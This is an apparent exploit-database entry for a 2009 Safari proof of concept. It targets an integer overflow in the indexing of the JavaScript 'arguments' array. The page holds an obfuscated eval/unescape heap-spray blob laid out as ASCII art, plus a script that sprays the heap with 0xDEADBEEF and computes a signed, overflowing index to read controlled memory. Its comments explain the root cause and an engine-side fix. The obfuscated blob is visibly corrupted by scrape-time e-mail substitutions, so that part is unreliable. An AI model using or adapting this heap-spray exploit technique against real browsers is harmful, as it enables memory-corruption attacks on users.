Safari (Arguments) Array Integer Overflow PoC (New Heap Spray)

2009-01-05T00:00:00
ID 1337DAY-ID-6707
Type zdt
Reporter SkyLined
Modified 2009-01-05T00:00:00

Description

Exploit for multiple platforms in category dos / poc

                    
                      ==============================================================
Safari (Arguments) Array Integer Overflow PoC (New Heap Spray) 
==============================================================


<BODY>
	<CODE id="sploit status"></CODE>
	<CODE id="heapspray status"></CODE>
	<SCRIPT>

i=0;eval(unescape(("gA#MAAA#Ag#[email protected][email protected]@UNUAU#[email protected]#[email protected]#[email protected]?N?A?#?A?A???g?O?E?E?E?U?M?N??AA#E?A#[email protected]?A????AONgAE#M?ANg#MNO#ENO#[email protected]#A???gAAU?AN#MAAN?OAE?A#MaN#EMAANgAAEgA#M#A#?#\
Eg                                                                                                                                         #\
#M                                                            NgAN?#?Q?                                                                         U\
?U                                                         AOgA?AAUgAAE#EMAg#N                                                                       @\
#U                                                       ?AAEg##[email protected]?NgE                                                                     A\
O?                                                      AAMg#[email protected]#NAEAN?E??MEAOAUAA#@U                                                                    ?\
AE             g##ENMgAgAgA?                                  [email protected]##EgM#E?g?U    [email protected]#MgEAUAA                                                                AMA#A  E\
AA          [email protected]#[email protected]@#AAN#N??NN#A?                              g#NU#U#gMMAA        MA#AEAA                                                              [email protected]#[email protected] A\
[email protected]         #?AN#???NN#??g##U#U#gMNN#AAN#NAE                            NN#?AN#?AEg          M#E??A                                             AA?              ?O#AAOgAAU?A A\
Ug       #N#M?aMgA#?gA#ENNAA#@AA#@AA#@AAUE?N?E                          g##Mg##?g##           EgEgMU                                             E?E#M?         Aa??A#EAUAAAUAU  #\
@A      UAAUEUg#MNN#?U#U#UEAO#MNN#AU#U##EAE#[email protected]                         #NU##?#?UE            Mg#M?                                               ??N?Ug#?AU  E?EAEUA#M#  ?gO#A#?  U\
E?     EANUA#M#AUE?EANN?A#?EgE?A#MaAUEMN#M?NgA?U?UU                        Eg#AU???g#M             AUAAA                                                  UAAUEg#A#MO    #MAUAAA   U\
AA    UEMU#M?NgA?U?U#E?EUU    AOA#?OgA???M?AM?gU?E                        AOA??ENM???             [email protected]                                                           gU?EAO    A\
MA    #[email protected]?AAEA        E?EgU?EA?UEg#?E?                        [email protected]#?             A???                                                          NgA?E     A\
E?   [email protected]?           NM?gU?EA?MAAA#N                       AA#AAA#aAA#AAA#           AAA#?                                                         U?#Eg      A\
UU   AUAUAO?EAgME?            A??ggg#[email protected]                       N#EAMAEAE?EA?MAAA#NU?        #E?N#                                                         M?EUN      A\
@?   @gA#[email protected]#M?g?             [email protected]?NAM#EMAA                        @AE????gAAOg#NAA           @MEA    @[email protected]                                                  A?AA       E\
g#  NAAM#[email protected]#N            AAMgNME??AU?NN#M                        [email protected]             ?AAA   OAUAAUMA                                                 N??A       ?\
AA  AN?a?N?U?UAO         UMAN??AA?AAEU?#EMMAN??A                        A?A#MgA?A              #EMMA   N??A?AAa                                                 M??#       E\
g#  ?AgAAA?E?M?A            ??gAgAAOMMAU?NMNN                         E?U???               gME?   ?N#A#g                                                  #AU        ?\
??   gAE#MA#g#A#M             ONEg#MOAO??M                          NNEg                #MOM                  E??N#                                   A#g#        A\
#M   O#M??M?AUAUg               AA??gMANA                           N                ANAN                AU?M?#UA??gMA                                 A??U        g\
A#   EU?UN#UAAAA#               NAUAA#E      MAA                                     #MNA      EA#     MN ANME?NUEAOAAAMAU#MA                                #g#        A\
U?    ??gAEA#g#A#M               O#EgM     NEg#gA                                     gAME     ?gA??E   ?U?UME??AU?NN   #?E#MNA?                               a?A        ?\
E?    [email protected]              E#E?     A#MAUAAAU                           A         A#E?   U#MNA?#?O  ?E?UAONA?U??      ?gAO?O          AE#NAE                 A?NA        ?\
U?     ??gAO#AAEAE#             E?     ???gAAO?g#M                          ?U#E?        g#N#  M#?#E?gAMAM    N#?AAE#M       ?A#EMA        [email protected]??ggAO               #AAU        ?\
gA      EAE?AAE#M??#                 EgMNMgAgAgA?NA                        @?AUO#@        AU?N     MNUEg#U   AME??N#        A#MU#       M??#EU  NA#UAME?              [email protected]?        ?\
gA       [email protected]#Ug                #[email protected][email protected]                       ?#EUNANU?        #EUN     AUAUgA    ANg#g#        gA?MM      E?gA     @?N?A?A             NMg         #\
g#         [email protected]??AgA?E?                U?E???Ng#[email protected]??          ??A?            [email protected]@gA?        [email protected]     AA#AO#    [email protected]?        a?NgA      g#?      A?AA??A             gEA         @\
??           gA?N?g?M?                A?NgA?U?E???         [email protected]           [email protected]?NNM?        OAU#      NMNNE    [email protected]@        ?NNM     ?OME       N#??#M             A#A         ?\
A?            g#gAgAME                ?gA??E?U?UA        OA#?EAU    MEA      E#E????g       AAO?      NA?MEA    @A#?Q?        Eg#N #?O   #M?        N?OggA        @M#AO? NAE         #\
EM              A?OAA#A#               MaM#NAEgA?O       gA??gg    [email protected]?N?       [email protected]       gAgA      ??gAA    OAUAA        A???  ??g#? AgA        g#[email protected]??       [email protected]#[email protected]?M         g\
Ag               #[email protected]?A?              AA??Ag??A      ?NA?AO     ????gA?       [email protected]?       @?O#      EAEU?    U?#E??        ??gA    [email protected]       [email protected]#      AE?NAMN #?E#Mg#         A\
E?                 NAMAE?A             AM#EUNAUA     UgAAE     ?Ng#UEgA       ?A?A?       Mg#UA       [email protected]?#     [email protected]?        [email protected]?     ?????g#?AgAA  @UA?OAN?     ?#Na     ?AU#AA       E\
UN                   #[email protected][email protected]            ?AUNANU?#    E??#M      ??UO#@AUA       O?O#N      #N#NA       EAEAE    ?EAE?        ?UOA     O?O  #N#N#[email protected]     #EMA      [email protected] #NM      E\
N#                     ?EAAgO            ?#?Og#g#  #M??N        @AMME#E??       #M??U      OMEA        EAE?     ?UO?E        AAg     O?#?     Og#g#AU      MEM      NgMg        M\
N?                      #?aAAEA          @?A?#[email protected]#?A         ?Eg##?AUA      [email protected]      g?Eg        A?OA     @MEg#        UEg     A?A            ?A  [email protected]?a      [email protected]#        M\
AA                       UAAU?UNA         NU?UEg#UE#M??U          E?Ng#AE#M     AEAM      UE?EU        Eg#     #[email protected]        UEU     ?#M#          ?UE   ?EA       g#MA        #\
Ug     gN                   AOA#A?A??        #NM?U?A?OANAU#N          MNNE?#NM?    U?A?      OANME         N#      MA         A#g      #UEN        @#UA    EA?       #AN#A        #\
g#   UEAE#M                    A#g#UEgNA       OUMAU#NMN?A?Ug#?A           gEN?UAAE   #E?      [email protected]?                         A?#      [email protected]?     ???gA     ?Mg       #UAME        ?\
g?  Ag#UAAEAU#                    NMNgMNEg#U      AAEMEN   #MAA#Mg            #??NAg#N#MM?     AMAaA                          O#E      ?NAg#U#M M?AEA#AO     N#N       E#MAO        ?\
NA  EUAAE?NANUAAEA?                   #A#E?EN?AU     [email protected]#MAO?     NANN?A             #?EgE?A     AEA?#           A#Eg#            Ag#       MA#Mg#?NEAMA#AOA      E#E#      ENEAEA       #\
AO AE#EUE?Ng#AEAEg#AgAM                  #Mg#AgAEA#    g#UEUO       NEAEg#            [email protected]     AUAEA      ?#[email protected]#Ag       [email protected]       EUE?EUEg#AEAEU      EU?A       E#MAE       U\
E? EAgAE#MA#Mg#?AM                     AE#EAENEg#    MOAOAU       AAAUAUg           AAN     ?U?#?  [email protected][email protected]?NUEg#UN?M?A?#?Eg#[email protected][email protected]#U?AN??A    E?N        [email protected][email protected]       #UAA      @gNUAA       #\
Ug #EUNAMUAAO?NA                      gAEA#AOAE#E    UN?Ag        #UAAEAU#          NMN    ?A?Ug#?AgEUNA#???U?U?A           [email protected]?g? NgA         ?A?A?g?A     U   ?#EMA      [email protected]       ?\
A? ???AONUAEAN?                       ANUAOAE#EMA    ggME?         A??ggAN?         g?#    AEggME?A??ggAN?g       ?#AOAE#EU       [email protected]#UAA           @?A      ?   ??N?AA     NU?UEMU      A\
O?  ??OMN#EgMgMA                       #gA?AANAgAN    ?A?AN         Mg#g##EAN        ??#   Na?AU#OAEAE?       ?#?gO#gA??g#NU#U         #MAMgMA                gA    gAgA?AM    A?EAEUA      M\
A#  @MA?EANUAMA#                      @[email protected]?UA#gEg     #gA?          [email protected]?A?       a?E   ???E?aNAg        #ANAagAgAME?gAAgA?N?        #gA ?E???NA             O?E    A??AgA?E?N?  N?a?AAEA     O\
?A   [email protected]?NAA?#                     ?EA#?EgE?A?     ????M          [email protected]???N?A?N      gAgN  UEg#?A          gAAA?E?M?A??gAgA[email protected]?A?N?       ggA  ?OUNA#A?          A??U?      ??gAOAUAAUAAO?A?A?AUE     A\
#?    EgE?AU##?#?#                   [email protected]?NgE      UA#@         [email protected]?AUAAAE     Ug?E  A#g           A?NgA    gAAgUOANg#gA?      Ag#g    AgAAOUEAEA     A?#?EUE?        AgAUE#EA#UU#M?N?Ag?    ?\
E?     g?U??gAANgAg#                 UEAN?g?A?NgA       M??E      UM?NgA?ggA?M?A?Ng     Ag#A             N?#?Q      ?U?U?A?AUNAE     AUAA      U??EAAgEgA?Ag#AN?U?#?U?           [email protected]?AUAU    ?\
AA       EAE?EMN??A?gAgA             [email protected]?U?A         ?M?O        ?NgAMA?E??AO      M#AN            gA?M?        AUEMAAUAA#EMA  AUAUAAM       ??NAA?NgA?g?AgAAgMg              ?AAA?Ag?     U\
Eg        #?AMOgA?UgAg#ME#@gO#     NU##?A?#AME?E?NME          #M??         OAAOMU?      ?AA??          ?N?           AAO?N?N?A?UUEMM??AggA?        [email protected]@UEMNAE#EgM                        M\
?A           [email protected][email protected][email protected]#?gO#@NAAM?             U?O          AN        N#AE                       gENAA#?AgAgAME?gNAA          ??N?Ag#[email protected]#E                         N\
?U              NAUAUgAA#[email protected]???N?A                [email protected]                  M#A?                        ???U?AAA??ANNO            M#[email protected]?                          ?\
gA                 [email protected]?AAN                    gA?                  ?ANNE                          UEA?A?N               E?EAO                           ?\
A?                                                              A?AUE                                             AUU                           @\
NE                                                              AUAAU                                             A                            ?\
NA                                                             g#EUNg                                                                         N\
UA                                                             AO?NAg                                                                         N\
UA                                                             #???U?                                                                          U\
?A                                                            ?agAAg?                                                                          N\
gA                                                            ?A?A?g?A                                                                          N\
Mg                                                           A?ANNMAA#                                                                          ?\
A?                                                          ??NgA?EA?##                                                                          A\
@A                                        [email protected]?A???           [email protected]                                                                           A\
E?                                      [email protected]?AgEgA?Ag#?AANU?g      NAOA#A?A??#?U???                                                                           #\
?A                                    #MAUAAgA?  N?A?A??mE?A?AU??A?O?Eg#??MAgEAUAAUgMA?g                                                                            U\
#U                                   #MAA        OMANN?OAEA#UA?Eg#A#???Eg#AA?N?a                                                                             ?\
E?                                   gg             A??gA?N?A?EANAE?U?NgA?M                                                                              A\
@?                                  O                [email protected]@?NA#?E?                                                                                ?\
gA                                                                                                                                         ?\
?ANAOAA#E????gAAO?#aM#g#?aE?#AMAMaE?A#MAOgA#M?AANg#[email protected]?U?EgAAOgAAN?#?E?AgAANgAAO?#[email protected][email protected]#E?Ag??A?UAO?AAE#EA?A?AM?#AA#E#aAE#N").replace(/./g,function(c){return" `'^*\\/|-_.swdibYPW,".indexOf(c)<0?(i++%2?'':'%')+(c.charCodeAt()&15).toString(16):''})))

		// --- Index computation and heap-spray kick-off -------------------------
		// Root cause, per the notes below: the engine compares a 32-bit index as
		// a *signed* value against the array length, so indices at or above
		// 0x8000,0000 pass the bounds check, and the later "index * 4" address
		// computation has no overflow check. The engine-side mitigation is an
		// unsigned, overflow-safe bounds check before the index is ever scaled.
		// The index for the "arguments" array in a JavaScript function in
		// Safari suffers from a signedness issue that allows access to elements
		// that are out of bounds. The index is cast to a signed value before it
		// is compared to the length of the array to check if it within the
		// bounds. Integer values larger than 0x8000,0000 will be cast to a
		// negative value and because they are always smaller then the length,
		// they are treated as a valid index.
		// The index into the arguments array ends up in instructions
		// that multiply it by 4 to access data in an array of 32 bit values.
		// There are no checks for overflows in this calculation. This allows us
		// to cause it to access anything in memory:
		//   Pointer to object = base address + 4 * index
		// The base address varies only slightly and is normally about
		// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
		// predictable location using heap spraying, we can then calculate an
		// index that will access this memory.
		var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
		// NOTE(review): iTargetArea is not referenced anywhere else in the
		// visible script; it appears to be a leftover.
		var iTargetArea = 0x10000000;
		// Be advised that heap spraying is "upside down" in Safari: strings
		// are allocated at high addresses first and as the heap grows, the
		// addresses go down. The heap will therefor grow in between a lot of
		// DLLs which reside in this area of the address space as well.
		// We'll need to find an area of memory to spray that is not likely to
		// contain a DLL and easy to reach.
		var iTargetAddress = 0x55555555;
		//   iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
		// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
		// JS numbers are doubles, so adding 0x1,0000,0000 here is exact; the
		// wraparound the PoC depends on happens in the engine's 32-bit multiply,
		// not in this script.
		var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0) 
		// iIndex = (iTargetAddress - iBase) / 4
		var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
		// We need to trigger the signedness issue so the index must be larger
		// then 0x8000,0000. Because of the integer overflow in the
		// multiplication, we can safely add 0x4000,0000 as often as we want;
		// the multiplication will remove it from the result.
		// 4 * 0x4000,0000 = 0x1,0000,0000, which is 0 modulo 2^32, so each step
		// changes only the index value, not the engine-side product.
		while (iIndex < 0x80000000) iIndex += 0x40000000
		// Status line written into the first <CODE> element of the body.
		// NOTE: Number.prototype.toString takes only a radix; the second
		// argument (8) is ignored, so these values are not zero-padded.
		document.getElementById("sploit status").innerHTML = (
			"iBase + 4 * iIndex = " +
			"0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
			"0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
		);
		// Set up heap spray
		// HeapSpray2 is not defined in the visible part of the script; it is
		// presumably produced by the eval(unescape(...)) statement above. That
		// blob, as archived, contains literal "[email protected]" substitutions
		// (scrape-time e-mail obfuscation), so this listing is unlikely to
		// evaluate as printed.
		var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
		// Presumably where the spray helper reports progress; this is the
		// second <CODE> element of the body.
		oHeapSpray.oOutputElement = document.getElementById("heapspray status")
		// Spray heap asynchronously and call sploit when done.
		// sploit is a hoisted function declaration further down in this script.
		oHeapSpray.spray(sploit)
		/**
		 * Trigger callback, invoked by the spray helper once spraying is done.
		 * @param {object} oHeapSpray - presumably the spray object handed back by
		 *   spray(); not used here, the trigger only reads the closed-over iIndex.
		 */
		function sploit(oHeapSpray) {
			// This will cause an access violation using the value 0xDEADBEEF,
			// which comes from the strings we sprayed the heap with.
			// 6aa3d57f 8b4f0c     mov   ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
			// On an engine with a correct (unsigned) bounds check this is an
			// ordinary property lookup on the arguments object that yields
			// undefined; the result is discarded either way.
			arguments[iIndex];
		}
		/**
		 * Encode a 32-bit integer as two UTF-16 code units, low 16 bits first.
		 * @param {number} iValue - value treated as int32 by the bit operations
		 * @returns {string} two-character string: low half, then high half
		 */
		function DWORD(iValue) {
			var iLow = iValue & 0xFFFF;
			// Sign-extended for values >= 0x80000000, but fromCharCode reduces
			// each argument to 16 bits, so the result is the same as an unsigned shift.
			var iHigh = iValue >> 16;
			return String.fromCharCode(iLow, iHigh);
		}
	</SCRIPT>
</BODY># 0day.today [2018-03-14] #